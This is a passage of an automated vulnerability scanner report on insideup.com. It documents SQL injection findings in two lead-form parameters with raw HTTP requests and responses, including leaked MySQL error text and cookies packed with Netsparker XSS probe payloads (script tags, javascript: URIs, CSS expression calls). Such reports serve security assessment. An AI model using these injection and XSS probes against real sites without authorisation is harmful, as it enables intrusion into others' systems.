OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:52:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=i4sjduncfmsf0k65ci9sg520o5; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.211. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:53:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=bno3jpsslvb4inhub3tjk6nnj7; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:53:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=6ft0rh4fnemk98bn9i793oj403; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.212. http://www.insideup.com/ppc/leadflow/deco00/project.php [attributeId_343_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project.php

Issue detail

The attributeId_343_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_343_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9'&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:53:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ghukbgu4r0tle6lefj5rmb0e00; path=/
Content-Length: 6334
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
is the first time&attributeId_392=1924__Yes&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30009&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from businesses only&attributeId_388=1896__$500 - 1,000&attributeId_389=1905__1&' at line 5

Request 2

GET /ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9''&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_387=1892__Collect+from+businesses+only&attributeId_388=1896__%24500+-+1%2c000&attributeId_389=1905__1&attributeId_390=1912__Less+than+2+months&attributeId_391=1919__This+is+the+first+time&attributeId_392=1924__Yes&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30009&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; 